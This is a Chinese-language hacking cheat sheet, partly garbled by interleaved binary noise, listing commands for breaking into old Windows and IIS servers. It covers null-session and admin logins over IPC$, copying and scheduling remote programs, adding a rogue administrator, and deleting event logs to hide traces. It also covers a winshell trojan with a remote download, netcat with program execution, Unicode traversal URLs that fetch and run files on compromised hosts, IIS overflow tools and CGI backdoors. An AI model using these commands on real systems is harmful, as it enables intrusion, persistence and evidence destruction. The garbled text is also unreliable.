网管和黑客都必须知道的命令
)O7��Mfr�� 常用的几条NET命令:
uN��x3us- g" M1�HxlV (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
y�r;oq(&N� /D~
�,X48+ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
+�pjD{S�~Y ,g��\.C+.S (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
,%ajIs"Gi� '-v~HwC+/T (查看远程主机时间) net time \\IP地址
�#4"���\\ fk"�,Y�tS* (定时启动某个程序) at \\IP地址 02:18 readme.exe
m��X�2Qf8� ;��2X1�qw> (查看共享) net view \\IP地址
xS�L��N��� wL%��>���� (查看netbios工作组列表) nbtstat -A IP地址
zizrc.g/Yg 0q62��{�p7 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
+5T��0��]! E2�6ZVFg� (这两条把自己增加到管理员组): net user 用户名 密码 /add
1[}VyP6 e� @7BH`b$�)! net localgroup Administrators 用户名 /add
~^3B(feQ]
�s'�K0C8'U (断开连接) net use \\IP地址\ipc$ /delete
+"�d{P,[3J I��.�(�
9{ 扫尾:
=R���Q��>q K):�)bL�(B del C:\winnt\system32\logfiles\*.*
7tt&/k�?Q #D}NT*w��/ del C:\winnt\ssytem32\config\*.evt
H ($=k�-+5 ~i(*.Z)
�\ del C:\winnt\system32\dtclog\*.*
isD��r|g$S Ig9$ PP�+3 del C:\winnt\system32\*.log
nq$^}L�3&~ �L:�%h]�-� del C:\winnt\system32\*.txt
0,�VbB7 �z th��q(t�K7 del C:\winnt\*.txt
%_/_kl�xnO ?EtK/6dJZt del C:\winnt\*.log
4l�z9z>J.V �d�uwZe�+� 一、netsvc.exe
�5SK.R;mn� 4ci
@$�nL1 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�U��S
Q{�o k�-w._E
�< netsvc /list \\IP地址
f�M8� :Nt$ q|G�a
���� netsvc schedule \\IP地址 /query
>B3_�P4pW9 x�EZvCwsb� netsvc \\IP地址 schedule /start
,>e<mphM�� �&{7%Vs�TB 二、OpenTelnet.exe
�W}T��$�Z� *�d)B��4qG 远程启动主机的Telnet服务,并绑定端口到7878,例如:
;%Z)$+Z_)< �3 i>�uKU1 OpenTelnet \\IP地址 用户名 密码 1 7878
LdRLKE<�'e ="X�xS|Mq3 然后就可以telnet到主机的7878端口,进入DOS方式下:
Q�+#, Vu�M G�:A`
n;E0 telnet IP地址 7878
uS<&$J���H �X\�f�lx~� 三、winshell.exe
J�Zai{0s�e 9v/1>�rziE 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
��ON�!1l�S �eLl��;M4d p Path (查看winshell主程序的路径信息)
��=o�9�
%) g.z/%Lp��K b reBoot (重新启动机器)
i5�:�fn@�& J/)Q{��*`_ d shutDown (关闭机器)
�%"{SG���p
��1vQ*Br� s Shell (执行后你就会看到可爱的“C:\>”)
_%.atW7��� gl��H�Hr�� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
M�<��Eg<�* cp]\<p('A CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
edb�zg�#wy ia�o_w'tJ� 四、3389登陆器,GUI方式登录远程主机的
�0 �5 `x$f ?L7z�\b"_~ 五、elsave.exe
B(E+�2;!QF DQwbr\xy�\ 事件日志清除工具
wl}�Q|4rZ ��e�sFBW�J elsave -s \\IP地址 -l "application" -C
?|�{P]i?)' "-\�I��?�k elsave -s \\IP地址 -l "system" -C
��.`iOWCS [_��C�IN elsave -s \\IP地址 -l "security" -C
H�jL�+Wg�� 9'��T
nR[> 执行后成功清除应用程序日志,系统日志,安全日志
-R�|�v&h%T !.kj-==s{7 六、hbulot.exe
%~G)xK?W*� Y+l�Z��T4w 开启win2kserver和winxp的3389服务
_?m��u2!X� I+y�dVj(Op hbulot [/r]
wR�\%tum�k �.y��|��*� 使用/r表示安装完成后自动重起目标使设置生效。
A)��'{�G� 9�Yd<_B��# 七、nc.exe(netcat.exe)
�Ptn0;GC�� ��/_�>S0�� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�_@SC� �R% uB�H4�E;[f 想要连接到某处: nc [-options] hostname port[s] [ports] ...
jIg]?�4bW[ �@�2Z{e�n? 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�T[q2quXgk
qN�[U|3k 参数:
08c�C��r�G ~x�kc�Q��{ -e prog 程序重定向,一旦连接,就执行 [危险!!]
-��=@d2�LY ��wNq�#v�n -g gateway source-routing hop point[s], up to 8
g2BE-0�,�R RQ!kV�M�@� -G num source-routing pointer: 4, 8, 12, ...
9�K~�X�}]u P�A&Ev0�`+ -h 帮助信息
b-\ 1D;��] 2w�+w'Ag_R -i secs 延时的间隔
(H�DR}!.E i�=nd][�1n -l 监听模式,用于入站连接
?7��*.S Lt Qw�}uB�$S> -n 指定数字的IP地址,不能用hostname
V*}ft@GPD� ?
0�p�_/mZ -o file 记录16进制的传输
��PFu{OJg& Rcc9Tx(zvQ -p port 本地端口号
xo�
a1='� �\0).
ODA( -r 任意指定本地及远程端口
�fl9`M�gu �GO2�mccIB -s addr 本地源地址
*%E4��,(T �Z�8%?ej`8 -u UDP模式
pE,2p�T�2> �jEV�D��z� -v 详细输出——用两个-v可得到更详细的内容
�g1Ed:�V]_ m�%]1~�b}" -w secs timeout的时间
o#fr5�>h-w j
4��!$�[h -z 将输入输出关掉——用于扫描时
x��8
_f/2& 八、TFTPD32.EXE
J�;�|a)N�w %�6�8'+�qz 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
I() =Ufs5z O`K2mt\%�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
Gh>&+UA'$1 z{�`K_s�%5 然后可以直接令文件运行:
u�G�O�ED-@ _wH>�h$��E http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Vkd�G��GY� 1�-�0�tG+ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
/�W9(}Id�6 R�-�LM��V� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
( ��RO-~�- �q=�(%
]BK 一、一 Xscan命令行运行参数说明:
�& %A&&XT9 6I2`���oag 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�eu={6/O�� `Y �O(C<r- 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�p>_Qn�s7W & 6'Rc#\�P xscan -file <主机列表文件名> <检测项目> [其他选项]
�N,W� �?} 'H�K�DGQl` 其中<检测项目> 含义如下:
u�}�3D'h ��'b�)qP|� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
��DK)T2{�: :aQ�.:b�(n -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�R���j�p7H �~(nc�<M[� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
7�6H>ST@G| >�Q�$p�h=� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�l^F ?^kP� dq,j?~ �_} -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�Yw] ��7@ �plL��|Ubn [其他选项] 含义如下:
J-#V_TzJ? �w�g%g(FO -v: 显示详细扫描进度
��&�h�En3u &S,_Z�/BS; -p: 跳过Ping不通的主机
��"!+g�A&� {ET����M > -o: 跳过没有检测到开放端口的主机
Z�_W�zm!�: ���J3�`0i@ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
